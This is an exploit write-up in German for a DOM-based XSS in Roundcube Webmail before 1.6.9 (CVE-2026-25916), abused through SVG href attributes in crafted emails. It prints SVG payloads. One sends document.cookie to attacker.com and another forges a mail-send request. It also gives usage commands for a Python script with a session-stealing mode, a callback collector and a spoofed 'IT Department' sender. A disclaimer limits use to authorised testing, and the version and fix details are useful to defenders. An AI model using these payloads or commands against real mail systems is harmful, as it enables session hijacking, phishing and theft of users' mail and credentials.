
Python-Exploit für DOM-basiertes XSS in Roundcube Webmail (CVE-2026-25916) über SVG-href-Attribute, das Session-Hijacking und Datenextraktion durch präparierte E-Mails ermöglicht.
Exploit-Titel: Roundcube Webmail DOM XSS über SVG href (CVE-2026-25916)
Autor: Mohammed Idrees Banyamer
Kontakt: GitHub @mbanyamer | Instagram @banyamer_security
Land: Jordanien
Datum: 9. Februar 2026
CVE: CVE-2026-25916
Typ: DOM-basiertes Cross-Site-Scripting (XSS)
Plattform: Webanwendung
Getestet auf: Roundcube 1.6.8, Ubuntu 22.04
CVSS-Score: 6.1 (Mittel)
⚠️ WARNUNG: Dieser Exploit dient ausschließlich Bildungs- und autorisierten Testzwecken.
Verwenden Sie ihn nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
Der Autor ist nicht verantwortlich für jeglichen Missbrauch oder illegale Aktivitäten.
Roundcube Webmail-Versionen vor 1.6.9 enthalten eine DOM-basierte XSS-Schwachstelle in der SVG-Verarbeitung. Die Anwendung bereinigt die Attribute und in SVG-Elementen nicht ordnungsgemäß, wodurch die Ausführung von JavaScript über speziell präparierte E-Mails ermöglicht wird.
hrefxlink:hrefBetroffene Versionen: Roundcube Webmail < 1.6.9
Behoben in: Version 1.6.9 (Commit 26d7677)
CWE: CWE-79 – Unzureichende Neutralisierung von Eingaben bei der Generierung von Webseiten
Angriffsvektor: Remote über E-Mail
Auswirkung: Session-Hijacking, Kontoverwaltung, Datendiebstahl
Die Schwachstelle existiert in rcube_washtml.php, wo href-Attribute in SVG-Elementen nicht ordnungsgemäß validiert wurden:
<!-- Angreifbare SVG-Elemente -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'[email protected]'})">
```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u [email protected] -w your_password -r [email protected]
python3 cve-2026-25916.py \
-s smtp.gmail.com \
-p 587 \
-u [email protected] \
-w app_password \
-r [email protected] \
-t session_steal \
--callback https://yourserver.com/collect \
--subject "Security Alert" \
--from-name "IT Department"